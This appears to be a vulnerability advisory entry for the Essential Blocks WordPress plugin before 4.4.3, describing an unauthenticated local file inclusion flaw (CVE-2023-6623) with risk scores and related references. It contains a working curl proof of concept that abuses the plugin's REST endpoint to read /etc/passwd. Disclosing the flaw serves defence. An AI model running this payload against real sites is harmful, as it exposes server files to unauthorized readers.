Lucene search
Marc MontpasWPEX-ID:633C28E0-0C9E-4E68-9424-55C32789B41FHistoryDec 21, 2023 - 12:00 a.m.
Essential Blocks < 4.4.3 - Unauthenticated Local File Inclusion
2023-12-2100:00:00
Marc Montpas
73
essential blocks
version 4.4.3
unauthenticated
local file inclusion
vulnerability
vulnerable-site.tld
curl
exploit
Description The plugin does not prevent unauthenticated attackers from overwriting local variables when rendering templates over the REST API, which may lead to Local File Inclusion attacks.
curl --url 'http://vulnerable-site.tld/wp-json/essential-blocks/v1/queries?block_type=nonexisting_block&query_data=%7B%22source%22%3A+%22post%22%7D&attributes=%7B%22__file%22%3A+%22%2Fetc%2Fpasswd%22%7D'Related
nvd
nvd
CVE-2023-6623
2024-01-15 16:15:12
nuclei
nuclei
Essential Blocks < 4.4.3 - Local File Inclusion
2024-01-04 07:27:23
cvelist
cvelist
wpvulndb
wpvulndb
Essential Blocks < 4.4.3 - Unauthenticated Local File Inclusion
2023-12-21 00:00:00
cve
cve
CVE-2023-6623
2024-01-15 16:15:12
prion
prion
Design/Logic Flaw
2024-01-15 16:15:00
6.7 Medium
AI Score
Confidence
Low
0.071 Low
EPSS
Percentile
94.0%
Related for WPEX-ID:633C28E0-0C9E-4E68-9424-55C32789B41F